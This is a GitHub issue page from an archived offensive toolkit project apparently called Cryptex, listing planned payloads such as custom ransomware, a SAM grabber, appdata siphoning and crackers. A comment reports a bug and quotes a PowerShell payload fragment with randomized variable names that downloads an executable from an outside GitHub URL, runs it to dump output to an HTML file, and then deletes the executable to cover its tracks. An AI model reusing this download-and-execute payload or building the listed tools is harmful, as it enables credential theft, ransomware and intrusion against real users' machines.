Skip to content
This repository has been archived by the owner on Oct 6, 2022. It is now read-only.

Cryptographic Payloads #7

Open
1 of 8 tasks
AlexKollar opened this issue Jul 5, 2022 · 1 comment
Open
1 of 8 tasks

Cryptographic Payloads #7

AlexKollar opened this issue Jul 5, 2022 · 1 comment
Assignees
Labels
enhancement New feature or request Python-Related

Comments

@AlexKollar
Copy link
Contributor

  • - custom ransomware
  • - executable ciphers
  • - executable breakers
  • - code obfuscator
  • - crackers
  • - appdata siphoning
  • - SAM grabber
  • - encdoded/encrypted payloads
@AlexKollar
Copy link
Contributor Author

AlexKollar commented Jul 18, 2022

Hey @CosmodiumCS I noticed a bug I think you mentioned before in the CP section of the program. They are still referencing the old github link. I just added this here instead of making a whole issue for it since we are still working on the development of Cryptographic Payloads for Cryptex.

    return -join ((65..90) + (97..122) | Get-Random -Count 10 | ForEach-Object {[char]$_})
}
$TcDrgEHOCo = uCmLBUkWvE
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/AlexKollar/Cryptex/master/payloads/web/web.exe' -OutFile "$TcDrgEHOCo.exe"
$zXMpyWDQjY = uCmLBUkWvE
Invoke-Expression "./$TcDrgEHOCo.exe /shtml $zXMpyWDQjY.html"
Start-Sleep 2
Remove-Item "$TcDrgEHOCo.exe 
Remove-Item "$zXMpyWDQjY.html"% ```  

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
enhancement New feature or request Python-Related
Projects
No open projects
Status: 📋 To-Do
Development

No branches or pull requests

2 participants